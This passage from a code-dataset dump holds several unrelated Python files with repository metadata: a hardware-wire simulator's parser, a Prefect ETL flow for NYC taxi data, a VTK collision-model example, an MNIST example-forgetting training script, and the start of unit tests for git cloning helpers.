readers = bit_dictionary.get(user_in).get_readers()\r\n\r\n for reader in readers:\r\n reader(user_inputs.get(user_in))\r\n\r\n else:\r\n # TODO: Get input from user input\r\n\r\n for hwc_input in inputs:\r\n \r\n user_inputs[hwc_input] = int(input(\"Enter input for \" + str(hwc_input) + \": \"))\r\n\r\n \r\n assert user_inputs[hwc_input] >= 0\r\n assert user_inputs[hwc_input] < 2**(hwc_input[1]) # TODO: report an error to the user, not assert!\r\n \r\n\r\n # TODO: Drive rest of bits off input\r\n # Follow until an output is reached\r\n for constant in constants:\r\n readers = bit_dictionary.get(constant).get_readers()\r\n\r\n for reader in readers:\r\n reader(constants[constant])\r\n\r\n for mem in memory:\r\n readers = bit_dictionary.get(mem[0]).get_readers()\r\n\r\n for reader in readers:\r\n reader(memory.get(mem).get_value())\r\n\r\n for user_in in user_inputs:\r\n readers = bit_dictionary.get(user_in).get_readers()\r\n\r\n for reader in readers:\r\n reader(user_inputs.get(user_in))\r\n\r\n # TODO: Show output\r\n\r\n'''\r\nFunction: parse_args()\r\nPurpose: Parses sys.argv runtime arguments and fills the respective variable if argument is called\r\n\r\nUpdates: 3/1/2020 - Removed parsing from main() and moved to own function - Dilen Govin\r\n'''\r\ndef parse_args():\r\n # Points to the first argument in sys.argv list\r\n # The pointer moves to the next argument instead of checking total argument length\r\n arg_ptr = 1\r\n\r\n while (arg_ptr < len(sys.argv)):\r\n\r\n # NOT supported right now\r\n if (sys.argv[arg_ptr] == \"--reset\"):\r\n print(\"Command option '--reset' argument is currently not supported\")\r\n global reset\r\n reset = True\r\n arg_ptr += 1\r\n continue\r\n\r\n # NOT supported right now\r\n if (sys.argv[arg_ptr] == \"--genTemplate\"):\r\n print(\"Command option '--genTemplate' argument is currently not supported\")\r\n global genTemplate\r\n genTemplate = True\r\n arg_ptr += 1\r\n continue\r\n\r\n # Sets the tick amount for the simulator to run\r\n if (sys.argv[arg_ptr] == \"--run\"):\r\n global tick_count\r\n tick_count = sys.argv[arg_ptr + 1]\r\n arg_ptr += 2\r\n continue\r\n\r\n # Sets the wire_filename is the simulator will run\r\n if (sys.argv[arg_ptr] == \"--wire\"):\r\n global wire_filename\r\n wire_filename = sys.argv[arg_ptr + 1]\r\n arg_ptr += 2\r\n continue\r\n\r\n # Sets the input file that the simluator will use for inputs\r\n if (sys.argv[arg_ptr] == \"--input\"):\r\n global input_filename\r\n input_filename = sys.argv[arg_ptr + 1]\r\n arg_ptr += 2\r\n continue\r\n\r\n # NOT supported right now\r\n if (sys.argv[arg_ptr] == \"--debug\"):\r\n global debug\r\n debug = sys.argv[arg_ptr + 1]\r\n arg_ptr += 2\r\n continue\r\n\r\n # TODO: Auto gen input\r\n if (sys.argv[arg_ptr] == \"--auto\"):\r\n global auto\r\n auto = True\r\n arg_ptr += 1\r\n continue\r\n\r\n # Additional arguments place under here\r\n\r\n # Print the argument fields to verify its working\r\n print(\"\\n############################################################################\\n\")\r\n\r\n print(\"Wire File: \" + str(wire_filename.split(\"/\")[-1]))\r\n print(\"Input File: \" + str(input_filename))\r\n print(\"Tick Count: \" + str(tick_count))\r\n print(\"Reset: \" + str(reset))\r\n print(\"Debug: \" + str(debug))\r\n print(\"Generate Template: \" + str(genTemplate))\r\n print(\"Auto: \" + str(auto))\r\n\r\n print(\"\\n############################################################################\\n\")\r\n\r\n'''\r\nFunction: parse_wire_file()\r\nPurpose: Parses the components of the wire file and \r\n\r\nUpdates: 3/1/2020 - Removed wire file parsing from main() and moved to own function - Dilen Govin\r\n'''\r\ndef parse_wire_file():\r\n try:\r\n # Open the file\r\n file = open(wire_filename, \"r\")\r\n\r\n # Initializa bit dictionary using Python built in dictionary\r\n # Store read-write values in an array for now\r\n # TODO: Make a custom data structure to model READ-WRITE?\r\n # TODO: Make a custom data structure to model this?\r\n \r\n global outputs\r\n global inputs\r\n\r\n global logic_ops\r\n global constants\r\n global memory\r\n \r\n # Read the first line to initialize while loop\r\n line = file.readline()\r\n\r\n while line:\r\n # Avoid comment lines in .wire files\r\n if (line[0] == \"#\"):\r\n line = file.readline()\r\n continue\r\n\r\n # Catches empty and new lines\r\n if (line == \"\\n\" or line == \"\"):\r\n line = file.readline()\r\n continue\r\n\r\n # Extracts total bit size from .wire file\r\n if (line.startswith(\"bits\")):\r\n bits = int(line.split()[1])\r\n line = file.readline()\r\n continue\r\n\r\n if line.startswith(\"memory count\"):\r\n # parse_memory()\r\n mem_count = int(line.split()[2])\r\n line = parse_memory(mem_count, file)\r\n\r\n continue\r\n\r\n if line.startswith(\"logic count\"):\r\n # parse_logic_ops()\r\n logic_count = int(line.split()[2])\r\n line = parse_logic_ops(logic_count, file)\r\n\r\n continue\r\n\r\n if line.startswith(\"connection count\"):\r\n # parse_connections()\r\n conn_count = int(line.split()[2])\r\n line = parse_connections(conn_count, file)\r\n\r\n continue\r\n\r\n if line.startswith(\"i/o count\"):\r\n io_count = int(line.split()[2])\r\n line = parse_io(io_count, file)\r\n\r\n continue\r\n\r\n if line.startswith(\"constant count\"):\r\n constant_count = int(line.split()[2])\r\n line = parse_constants(constant_count, file)\r\n\r\n continue\r\n\r\n line = file.readline()\r\n\r\n file.close()\r\n\r\n if (auto):\r\n print(bit_dictionary.get_test_str())\r\n else:\r\n print(bit_dictionary)\r\n\r\n for logic_op in logic_ops:\r\n print(logic_ops[logic_op])\r\n\r\n print(\"INPUTS: \")\r\n\r\n for input_bit in inputs:\r\n print(input_bit)\r\n\r\n print(\"OUTPUTS: \")\r\n\r\n for output in outputs:\r\n print(output)\r\n\r\n print(\"\\n############################################################################\\n\")\r\n\r\n\r\n except IOError:\r\n print(\"ERROR: Unable to find or open \" + wire_filename)\r\n exit(1)\r\n\r\ndef parse_memory(mem_count, file):\r\n line = file.readline()\r\n\r\n for mem in range(mem_count):\r\n mem_info = line.split()\r\n\r\n size = int(mem_info[2])\r\n read = int(mem_info[4])\r\n write = int(mem_info[6])\r\n\r\n # Build keys for dictionary\r\n reader_key = (read , size) # out val\r\n writer_key = (write, size) # in val\r\n\r\n '''\r\n NOTE: Memory size is relative to the size of what it holds. So a size of 1 means the memory holds 1\r\n bit of information. Since there is a mem latch in the memory object, the actual mem bit size\r\n is double the size in the .wire file.\r\n '''\r\n\r\n mem_obj = Memory(size);\r\n\r\n memory[(reader_key, writer_key)] = mem_obj\r\n \r\n print(mem_obj)\r\n\r\n line = file.readline()\r\n \r\n return line\r\n\r\ndef parse_logic_ops(logic_count, file):\r\n line = file.readline()\r\n\r\n for logic in range(logic_count):\r\n logic_info = line.split()\r\n \r\n if (logic_info[1] == \"NOT\"):\r\n size = int(logic_info[3])\r\n a = int(logic_info[5])\r\n out = int(logic_info[7])\r\n\r\n # Build keys for dictionary\r\n reader_a_key = (a , size)\r\n writer_key = (out, size)\r\n\r\n # Parse \"to\" bit\r\n result = bit_dictionary.addWriter(writer_key)\r\n\r\n if not result:\r\n print(\"Short circuit detected @ \" + line)\r\n exit(1)\r\n\r\n # Create NOT Object for LogicOp\r\n not_obj = NOT(bit_dictionary.get_readers(writer_key), \r\n bit_dictionary.get_writers(writer_key), \r\n \"NOT-\" + str(writer_key))\r\n\r\n # Parse from side\r\n bit_dictionary.addReader(reader_a_key, lambda val: not_obj.deliver_a(val))\r\n\r\n logic_ops[not_obj.getName()] = not_obj\r\n\r\n else:\r\n size = int(logic_info[3])\r\n a = int(logic_info[5])\r\n b = int(logic_info[7])\r\n out = int(logic_info[9])\r\n\r\n # Build keys for dictionary\r\n reader_a_key = (a , size)\r\n reader_b_key = (b , size)\r\n writer_key = (out, size)\r\n\r\n # Parse \"to\" bit\r\n result = bit_dictionary.addWriter(writer_key)\r\n\r\n if not result:\r\n print(\"Short circuit detected @ \" + line)\r\n exit(1)\r\n\r\n if logic_info[1] == \"AND\":\r\n # Create AND Object for LogicOp\r\n logic_obj = AND(bit_dictionary.get_readers(writer_key), \r\n bit_dictionary.get_writers(writer_key), \r\n \"AND-\" + str(writer_key))\r\n\r\n elif logic_info[1] == \"OR\":\r\n # Create AND Object for LogicOp\r\n logic_obj = OR(bit_dictionary.get_readers(writer_key), \r\n bit_dictionary.get_writers(writer_key), \r\n \"OR-\" + str(writer_key))\r\n\r\n elif logic_info[1] == \"XOR\":\r\n # Create AND Object for LogicOp\r\n logic_obj = XOR(bit_dictionary.get_readers(writer_key), \r\n bit_dictionary.get_writers(writer_key), \r\n \"XOR-\" + str(writer_key))\r\n\r\n elif logic_info[1] == \"EQ\":\r\n # Create EQ object for LogicOp\r\n logic_obj = EQ(bit_dictionary.get_readers(writer_key), \r\n bit_dictionary.get_writers(writer_key), \r\n \"EQ-\" + str(writer_key))\r\n\r\n elif logic_info[1] == \"NEQ\":\r\n # Create NEQ object for LogicOp\r\n logic_obj = NEQ(bit_dictionary.get_readers(writer_key), \r\n bit_dictionary.get_writers(writer_key), \r\n \"NEQ-\" + str(writer_key))\r\n\r\n elif logic_info[1] == \"GT\":\r\n # Create EQ object for LogicOp\r\n logic_obj = GT(bit_dictionary.get_readers(writer_key), \r\n bit_dictionary.get_writers(writer_key), \r\n \"GT-\" + str(writer_key))\r\n\r\n elif logic_info[1] == \"GE\":\r\n # Create EQ object for LogicOp\r\n logic_obj = GE(bit_dictionary.get_readers(writer_key), \r\n bit_dictionary.get_writers(writer_key), \r\n \"GE-\" + str(writer_key))\r\n\r\n elif logic_info[1] == \"LT\":\r\n # Create EQ object for LogicOp\r\n logic_obj = LT(bit_dictionary.get_readers(writer_key), \r\n bit_dictionary.get_writers(writer_key), \r\n \"LT-\" + str(writer_key))\r\n\r\n elif logic_info[1] == \"LE\":\r\n # Create EQ object for LogicOp\r\n logic_obj = LE(bit_dictionary.get_readers(writer_key), \r\n bit_dictionary.get_writers(writer_key), \r\n \"LE-\" + str(writer_key))\r\n\r\n else:\r\n print(\"ERROR: Logic object not yet supported\")\r\n exit(1)\r\n\r\n # Parse from side\r\n bit_dictionary.addReader(reader_a_key, lambda val: logic_obj.deliver_a(val))\r\n bit_dictionary.addReader(reader_b_key, lambda val: logic_obj.deliver_b(val))\r\n\r\n logic_ops[logic_obj.getName()] = logic_obj\r\n\r\n line = file.readline()\r\n\r\n return line\r\n\r\ndef parse_connections(connCount, file):\r\n line = file.readline()\r\n\r\n for conn in range(connCount):\r\n connInfo = line.split()\r\n \r\n size = int(connInfo[2])\r\n toBit = int(connInfo[4])\r\n fromBit = int(connInfo[6])\r\n\r\n reader_key = (fromBit, size)\r\n writer_key = (toBit , size)\r\n\r\n # Parse \"to\" side\r\n global result \r\n result = bit_dictionary.addWriter(writer_key)\r\n\r\n if not result:\r\n print(\"Short circuit detected @ \" + line)\r\n exit(1)\r\n\r\n # Parse \"from\" side\r\n bit_dictionary.addReader(reader_key, make_conn(writer_key))\r\n\r\n line = file.readline()\r\n \r\n return line\r\n\r\ndef parse_io(ioCount, file):\r\n line = file.readline()\r\n\r\n for io in range(ioCount):\r\n ioInfo = line.split()\r\n \r\n if (ioInfo[0] == \"input\"):\r\n size = int(ioInfo[2])\r\n inBit = int(ioInfo[4])\r\n\r\n writer_key = (inBit, size)\r\n\r\n bit_dictionary.addWriter(writer_key)\r\n inputs.append(writer_key)\r\n\r\n if not result:\r\n print(\"Short circuit detected @ \" + line)\r\n exit(1)\r\n\r\n else:\r\n size = int(ioInfo[2])\r\n outBit = int(ioInfo[4])\r\n\r\n reader_key = (outBit, size)\r\n output_obj = Output(\"OUT-\" + str(reader_key))\r\n\r\n # THIS IS WEIRD:\r\n # So print(x) works on Windows but it doesnt work on Mac\r\n # sys.stdout.write(x) works on Mac though\r\n #\r\n # https://stackoverflow.com/questions/2970858/why-doesnt-print-work-in-a-lambda\r\n bit_dictionary.addReader(reader_key, lambda val: sys.stdout.write(\"OUTPUT: \" + str(val) + \"\\n\")) #lambda val: output_obj.deliver_val(val))\r\n outputs.append(reader_key)\r\n\r\n line = file.readline()\r\n \r\n return line\r\n\r\ndef parse_constants(constantCount, file):\r\n line = file.readline()\r\n\r\n for constant in range(constantCount):\r\n constantInfo = line.split()\r\n\r\n size = int(constantInfo[2])\r\n fromBit = int(constantInfo[4])\r\n value = int(constantInfo[6])\r\n\r\n writer_key = (fromBit, size)\r\n\r\n # Add to bit dictionary\r\n bit_dictionary.addWriter(writer_key)\r\n constants[writer_key] = value\r\n\r\n line = file.readline()\r\n \r\n return line\r\n\r\n# Needed to lock values when using lambda\r\ndef make_conn(writer_key):\r\n return lambda val: [reader(val) for reader in bit_dictionary.get_readers(writer_key)]\r\n\r\nmain()\r\n","repo_name":"russ-lewis/HWC","sub_path":"hwcSim_py/sim_main.py","file_name":"sim_main.py","file_ext":"py","file_size_in_byte":21472,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"} +{"seq_id":"9624221250","text":"from datetime import timedelta\nfrom pathlib import Path\nfrom typing import Union\n\nimport click\nimport pandas as pd\nfrom prefect import flow, task\nfrom prefect.tasks import task_input_hash\nfrom prefect_gcp.cloud_storage import GcsBucket\n\nDATA_DIR = Path(\n Path(__file__).parent.absolute().parent,\n \"data\"\n)\nGCS_BUCKET_BLOCK_NAME = \"gcs-de-zoomcamp-bucket\"\n\n\n@task(log_prints=True, retries=3, cache_key_fn=task_input_hash, cache_expiration=timedelta(days=1))\ndef web_to_pandas(url: str) -> pd.DataFrame:\n \"\"\"Load dataset from web to pandas DataFrame\"\"\"\n df = pd.read_csv(url)\n print(f\"Loaded {df.shape[0]:,d} rows to pandas DataFrame.\")\n return df\n\n\n@task\ndef process_dataset(df: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Preprocess dataset inplace\"\"\"\n\n # modify boolean flag:\n if \"store_and_fwd_flag\" in df.columns:\n df.store_and_fwd_flag = df.store_and_fwd_flag.map({\"Y\": True, \"N\": False})\n\n # format dates:\n date_cols = [i for i in df.columns if i.endswith(\"_datetime\")]\n for col in date_cols:\n df[col] = pd.to_datetime(df[col])\n\n # column names to lowercase:\n df.columns = [i.lower() for i in df.columns]\n return df\n\n\n@task(log_prints=True)\ndef pandas_to_parquet(df: pd.DataFrame, parquet_filepath: Union[Path, str]):\n \"\"\"Save pandas DataFrame locally to .parquet file\"\"\"\n if not str(parquet_filepath).endswith(\".parquet\"):\n raise ValueError(f\"Only .parquet file type is allowed\")\n\n if not parquet_filepath.parent.exists():\n parquet_filepath.parent.mkdir(parents=True)\n\n df.to_parquet(parquet_filepath, compression=\"gzip\")\n print(f\"There are {df.shape[0]:,d} rows saved to {parquet_filepath.name}\")\n\n\n@task(log_prints=True)\ndef parquet_to_gcs_bucket(\n parquet_filepath: Union[Path, str],\n gcs_bucket_block_name: str\n) -> Union[Path, str]:\n \"\"\"Download local parquet file to Google Cloud Storage bucket\"\"\"\n gcp_bucket_block = GcsBucket.load(gcs_bucket_block_name)\n gcs_path = gcp_bucket_block.upload_from_path(\n from_path=parquet_filepath,\n to_path=parquet_filepath.name\n )\n print(f\"Successfully loaded to GCS Bucket. Path: `{gcs_path}`\")\n return gcs_path\n\n\n@flow\ndef etl_web_to_gcs(taxi_color: str, year: int, month: int):\n \"\"\"ETL flow to load data from web URL to Google Cloud Storage Bucket\"\"\"\n # web -> DataFrame\n taxi_data_url = (\n \"https://github.com/DataTalksClub/nyc-tlc-data/releases/download/\"\n f\"{taxi_color}/{taxi_color}_tripdata_{year}-{month:02d}.csv.gz\"\n )\n df = web_to_pandas(url=taxi_data_url)\n\n # preprocessing\n df = process_dataset(df)\n\n # DataFrame -> .parquet\n parquet_filepath = Path(DATA_DIR, f\"{taxi_color}_taxi_trips_{year}_{month:02d}.parquet\")\n pandas_to_parquet(df, parquet_filepath=parquet_filepath)\n\n # local .parquet -> Google Cloud Storage Bucket\n parquet_to_gcs_bucket(parquet_filepath, GCS_BUCKET_BLOCK_NAME)\n\n\n\n@click.command\n@click.option(\"--taxi_color\",\n type=str,\n help=\"Color of the taxi cabs\")\n@click.option(\"--year\",\n type=int,\n help=\"Year of a taxi trip\")\n@click.option(\"--month\",\n type=int,\n help=\"Month of a taxi trip\")\ndef etl_web_to_gcs_command(taxi_color: str, year: int, month: int):\n \"\"\"CLI command to get load data from web url to Google Cloud Storage bucket\"\"\"\n etl_web_to_gcs(taxi_color, year, month)\n\n\nif __name__ == \"__main__\":\n etl_web_to_gcs_command()\n","repo_name":"garistvlad/data-engineering-zoomcamp","sub_path":"week-2/prefect-src/flows/etl_web_to_gcs.py","file_name":"etl_web_to_gcs.py","file_ext":"py","file_size_in_byte":3474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"420916173","text":"\nimport vtk\nimport vtkesqui\n\n# Data source\nsphere = vtk.vtkSphereSource()\nsphere.SetPhiResolution(12)\nsphere.SetThetaResolution(12)\nsphere.Update()\n\n#Define model input and source\ninput = sphere.GetOutput()\nsource = vtk.vtkPolyData()\nsource.DeepCopy(input)\n\n#Smooth (deform) source mesh\nsmooth = vtk.vtkSmoothPolyDataFilter()\nsmooth.SetInput(source)\nsmooth.SetNumberOfIterations(200)\n\n#Model input mesh will be adapted to the source\nmodel = vtkesqui.vtkCollisionModel()\nmodel.SetInput(input)\nmodel.SetSource(smooth.GetOutput())\nmodel.SetColor(0.5 ,0.5 , 1.0)\nmodel.SetRadius(0.01)\n\n#A call to update method is made to force the model to be at its last state\nmodel.Update();\n\nren = vtk.vtkRenderer()\nrenWin = vtk.vtkRenderWindow()\nrenWin.AddRenderer(ren)\niren = vtk.vtkRenderWindowInteractor()\niren.SetRenderWindow(renWin)\n\n# Display original mesh\nm = vtk.vtkPolyDataMapper()\nm.SetInput(source)\na = vtk.vtkActor()\na.SetMapper(m)\na.GetProperty().SetOpacity(0.5)\nren.AddActor(a)\n\n# Display model output (smoothed polydata)\nactor = model.GetActor()\nren.AddActor(actor)\n\nren.SetBackground(0.3, 0.6, 0.3)\nrenWin.SetSize(500, 500)\n\nren.ResetCamera()\nren.GetActiveCamera().Azimuth(45)\niren.Initialize()\n\nrenWin.Render()\n\niren.Start()\n","repo_name":"Motiva/vtkESQui","sub_path":"Examples/CollisionDetection/Python/CollisionModel.py","file_name":"CollisionModel.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"23419332298","text":"from __future__ import print_function\nimport argparse\nimport numpy as np\nimport numpy.random as npr\nimport time\nimport os\nimport sys\nimport pickle\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nfrom torchvision import datasets, transforms\n\n\n# Format time for printing purposes\ndef get_hms(seconds):\n m, s = divmod(seconds, 60)\n h, m = divmod(m, 60)\n\n return h, m, s\n\n\n# Setup basic CNN model\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = nn.Conv2d(1, 10, kernel_size=5)\n self.conv2 = nn.Conv2d(10, 20, kernel_size=5)\n self.conv2_drop = nn.Dropout2d()\n self.fc1 = nn.Linear(320, 50)\n self.fc2 = nn.Linear(50, 10)\n\n def forward(self, x):\n x = F.relu(F.max_pool2d(self.conv1(x), 2))\n\n if args.no_dropout:\n x = F.relu(F.max_pool2d(self.conv2(x), 2))\n else:\n x = F.relu(F.max_pool2d(self.conv2_drop(self.conv2(x)), 2))\n\n x = x.view(-1, 320)\n x = F.relu(self.fc1(x))\n\n if not args.no_dropout:\n x = F.dropout(x, training=self.training)\n\n x = self.fc2(x)\n return F.log_softmax(x, dim=1)\n\n\n# Train model for one epoch\n#\n# example_stats: dictionary containing statistics accumulated over every presentation of example\n#\ndef train(args, model, device, trainset, optimizer, epoch, example_stats):\n train_loss = 0\n correct = 0\n total = 0\n batch_size = args.batch_size\n\n model.train()\n\n # Get permutation to shuffle trainset\n trainset_permutation_inds = npr.permutation(\n np.arange(len(trainset.train_labels)))\n\n for batch_idx, batch_start_ind in enumerate(\n range(0, len(trainset.train_labels), batch_size)):\n\n # Get trainset indices for batch\n batch_inds = trainset_permutation_inds[batch_start_ind:\n batch_start_ind + batch_size]\n\n # Get batch inputs and targets, transform them appropriately\n transformed_trainset = []\n for ind in batch_inds:\n transformed_trainset.append(trainset.__getitem__(ind)[0])\n inputs = torch.stack(transformed_trainset)\n targets = torch.LongTensor(\n np.array(trainset.train_labels)[batch_inds].tolist())\n\n # Map to available device\n inputs, targets = inputs.to(device), targets.to(device)\n\n # Forward propagation, compute loss, get predictions\n optimizer.zero_grad()\n outputs = model(inputs)\n loss = criterion(outputs, targets)\n _, predicted = torch.max(outputs.data, 1)\n\n # Update statistics and loss\n acc = predicted == targets\n for j, index in enumerate(batch_inds):\n\n # Get index in original dataset (not sorted by forgetting)\n index_in_original_dataset = train_indx[index]\n\n # Compute missclassification margin\n output_correct_class = outputs.data[\n j, targets[j].item()] # output for correct class\n sorted_output, _ = torch.sort(outputs.data[j, :])\n if acc[j]:\n # Example classified correctly, highest incorrect class is 2nd largest output\n output_highest_incorrect_class = sorted_output[-2]\n else:\n # Example misclassified, highest incorrect class is max output\n output_highest_incorrect_class = sorted_output[-1]\n margin = output_correct_class.item(\n ) - output_highest_incorrect_class.item()\n\n # Add the statistics of the current training example to dictionary\n index_stats = example_stats.get(index_in_original_dataset,\n [[], [], []])\n index_stats[0].append(loss[j].item())\n index_stats[1].append(acc[j].sum().item())\n index_stats[2].append(margin)\n example_stats[index_in_original_dataset] = index_stats\n\n # Update loss, backward propagate, update optimizer\n loss = loss.mean()\n train_loss += loss.item()\n total += targets.size(0)\n correct += predicted.eq(targets.data).cpu().sum()\n loss.backward()\n optimizer.step()\n\n sys.stdout.write('\\r')\n sys.stdout.write(\n '| Epoch [%3d/%3d] Iter[%3d/%3d]\\t\\tLoss: %.4f Acc@1: %.3f%%' %\n (epoch, args.epochs, batch_idx + 1,\n (len(trainset) // batch_size) + 1, loss.item(),\n 100. * correct.item() / total))\n sys.stdout.flush()\n\n # Add training accuracy to dict\n index_stats = example_stats.get('train', [[], []])\n index_stats[1].append(100. * correct.item() / float(total))\n example_stats['train'] = index_stats\n\n\n# Evaluate model predictions on heldout test data\n#\n# example_stats: dictionary containing statistics accumulated over every presentation of example\n#\ndef test(args, model, device, testset, example_stats):\n test_loss = 0\n correct = 0\n total = 0\n test_batch_size = 32\n\n model.eval()\n\n for batch_idx, batch_start_ind in enumerate(\n range(0, len(testset.test_labels), test_batch_size)):\n\n # Get batch inputs and targets\n transformed_testset = []\n for ind in range(\n batch_start_ind,\n min(\n len(testset.test_labels),\n batch_start_ind + test_batch_size)):\n transformed_testset.append(testset.__getitem__(ind)[0])\n inputs = torch.stack(transformed_testset)\n targets = torch.LongTensor(\n np.array(testset.test_labels)[batch_start_ind:batch_start_ind +\n test_batch_size].tolist())\n\n # Map to available device\n inputs, targets = inputs.to(device), targets.to(device)\n\n # Forward propagation, compute loss, get predictions\n outputs = model(inputs)\n loss = criterion(outputs, targets)\n loss = loss.mean()\n test_loss += loss.item()\n _, predicted = torch.max(outputs.data, 1)\n total += targets.size(0)\n correct += predicted.eq(targets.data).cpu().sum()\n\n # Add test accuracy to dict\n acc = 100. * correct.item() / total\n index_stats = example_stats.get('test', [[], []])\n index_stats[1].append(100. * correct.item() / float(total))\n example_stats['test'] = index_stats\n print(\"\\n| Validation Epoch #%d\\t\\t\\tLoss: %.4f Acc@1: %.2f%%\" %\n (epoch, loss.item(), acc))\n\n\nparser = argparse.ArgumentParser(description='training MNIST')\nparser.add_argument(\n '--dataset',\n default='mnist',\n help='dataset to use, can be mnist or permuted_mnist')\nparser.add_argument(\n '--batch_size',\n type=int,\n default=64,\n metavar='N',\n help='input batch size for training (default: 64)')\nparser.add_argument(\n '--epochs',\n type=int,\n default=200,\n metavar='N',\n help='number of epochs to train (default: 200)')\nparser.add_argument(\n '--lr',\n type=float,\n default=0.01,\n metavar='LR',\n help='learning rate (default: 0.01)')\nparser.add_argument(\n '--momentum',\n type=float,\n default=0.5,\n metavar='M',\n help='SGD momentum (default: 0.5)')\nparser.add_argument(\n '--no_cuda',\n action='store_true',\n default=False,\n help='disables CUDA training')\nparser.add_argument(\n '--seed',\n type=int,\n default=1,\n metavar='S',\n help='random seed (default: 1)')\nparser.add_argument(\n '--sorting_file',\n default=\"none\",\n help=\n 'name of a file containing order of examples sorted by a certain metric (default: \"none\", i.e. not sorted)'\n)\nparser.add_argument(\n '--remove_n',\n type=int,\n default=0,\n help='number of sorted examples to remove from training')\nparser.add_argument(\n '--keep_lowest_n',\n type=int,\n default=0,\n help=\n 'number of sorted examples to keep that have the lowest metric score, equivalent to start index of removal; if a negative number given, remove random draw of examples'\n)\nparser.add_argument(\n '--no_dropout', action='store_true', default=False, help='remove dropout')\nparser.add_argument(\n '--input_dir',\n default='mnist_results/',\n help='directory where to read sorting file from')\nparser.add_argument(\n '--output_dir', required=True, help='directory where to save results')\n\n# Enter all arguments that you want to be in the filename of the saved output\nordered_args = [\n 'dataset', 'no_dropout', 'seed', 'sorting_file', 'remove_n',\n 'keep_lowest_n'\n]\n\n# Parse arguments and setup name of output file with forgetting stats\nargs = parser.parse_args()\nargs_dict = vars(args)\nprint(args_dict)\nsave_fname = '__'.join(\n '{}_{}'.format(arg, args_dict[arg]) for arg in ordered_args)\n\n# Set appropriate devices\nuse_cuda = not args.no_cuda and torch.cuda.is_available()\ndevice = torch.device(\"cuda\" if use_cuda else \"cpu\")\nkwargs = {'num_workers': 1, 'pin_memory': True} if use_cuda else {}\n\n# Set random seed for initialization\ntorch.manual_seed(args.seed)\nif torch.cuda.is_available():\n torch.cuda.manual_seed(args.seed)\nnpr.seed(args.seed)\n\n# Setup transforms\nall_transforms = [\n transforms.ToTensor(),\n transforms.Normalize((0.1307, ), (0.3081, ))\n]\nif args.dataset == 'permuted_mnist':\n pixel_permutation = torch.randperm(28 * 28)\n all_transforms.append(\n transforms.Lambda(\n lambda x: x.view(-1, 1)[pixel_permutation].view(1, 28, 28)))\ntransform = transforms.Compose(all_transforms)\n\nos.makedirs(args.output_dir, exist_ok=True)\n\n# Load the appropriate train and test datasets\ntrainset = datasets.MNIST(\n root='/tmp/data', train=True, download=True, transform=transform)\ntestset = datasets.MNIST(\n root='/tmp/data', train=False, download=True, transform=transform)\n\n# Get indices of examples that should be used for training\nif args.sorting_file == 'none':\n train_indx = np.array(range(len(trainset.train_labels)))\nelse:\n try:\n with open(\n os.path.join(args.input_dir, args.sorting_file) + '.pkl',\n 'rb') as fin:\n ordered_indx = pickle.load(fin)['indices']\n except IOError:\n with open(os.path.join(args.input_dir, args.sorting_file),\n 'rb') as fin:\n ordered_indx = pickle.load(fin)['indices']\n\n # Get the indices to remove from training\n elements_to_remove = np.array(\n ordered_indx)[args.keep_lowest_n:args.keep_lowest_n + args.remove_n]\n\n # Remove the corresponding elements\n train_indx = np.setdiff1d(\n range(len(trainset.train_labels)), elements_to_remove)\n\n# Remove remove_n number of examples from the train set at random\nif args.keep_lowest_n < 0:\n train_indx = npr.permutation(np.arange(len(\n trainset.train_labels)))[:len(trainset.train_labels) - args.remove_n]\n\n# Reassign train data and labels\ntrainset.train_data = trainset.train_data[train_indx, :, :]\ntrainset.train_labels = np.array(trainset.train_labels)[train_indx].tolist()\n\nprint('Training on ' + str(len(trainset.train_labels)) + ' examples')\n\n# Setup model and optimizer\nmodel = Net().to(device)\noptimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum)\n\n# Setup loss\ncriterion = nn.CrossEntropyLoss()\ncriterion.__init__(reduce=False)\n\n# Initialize dictionary to save statistics for every example presentation\nexample_stats = {}\n\nelapsed_time = 0\nfor epoch in range(args.epochs):\n start_time = time.time()\n\n train(args, model, device, trainset, optimizer, epoch, example_stats)\n test(args, model, device, testset, example_stats)\n\n epoch_time = time.time() - start_time\n elapsed_time += epoch_time\n print('| Elapsed time : %d:%02d:%02d' % (get_hms(elapsed_time)))\n\n # Save the stats dictionary\n fname = os.path.join(args.output_dir, save_fname)\n with open(fname + \"__stats_dict.pkl\", \"wb\") as f:\n pickle.dump(example_stats, f)\n\n # Log the best train and test accuracy so far\n with open(fname + \"__best_acc.txt\", \"w\") as f:\n f.write('train test \\n')\n f.write(str(max(example_stats['train'][1])))\n f.write(' ')\n f.write(str(max(example_stats['test'][1])))\n","repo_name":"mtoneva/example_forgetting","sub_path":"run_mnist.py","file_name":"run_mnist.py","file_ext":"py","file_size_in_byte":12173,"program_lang":"python","lang":"en","doc_type":"code","stars":158,"dataset":"github-code","pt":"5"} +{"seq_id":"25445087807","text":"import os\nimport shutil\nimport unittest\nfrom unittest.mock import Mock, patch, call\nfrom git.exc import GitCommandError, InvalidGitRepositoryError\nfrom repository import (\n CommitNotValidException,\n RepoNotValidException,\n clone_github_repository,\n checkout_to_commit\n)\n\n\nclass TestGitFunctions(unittest.TestCase):\n\n def setUp(self):\n self.repo_url = \"https://github.com/example/repo.git\"\n self.destination_dir = \"test_repo\"\n self.commit_hash = \"abcd1234\"\n\n def tearDown(self):\n if os.path.isdir(self.destination_dir):\n shutil.rmtree(self.destination_dir)\n\n @patch('repository.git.Repo')\n def test_clone_github_repository(self, mock_repo):\n # Test cloning a valid repository\n expected_calls = [call.clone_from(self.repo_url, self.destination_dir)]\n\n clone_github_repository(self.repo_url, self.destination_dir)\n\n mock_repo.assert_has_calls(expected_calls)\n\n @patch('repository.git.Repo.clone_from')\n def test_clone_github_repository_existing_directory(self, mock_clone_from):\n clone_github_repository(self.repo_url, 'tests/repository')\n\n mock_clone_from.assert_not_called()\n\n @patch('repository.git.Repo.clone_from')\n def test_clone_github_repository_fails(self, mock_clone):\n mock_clone.side_effect = GitCommandError(\"clone\", \"error\")\n\n with self.assertRaises(RepoNotValidException):\n clone_github_repository(self.repo_url, self.destination_dir)\n\n 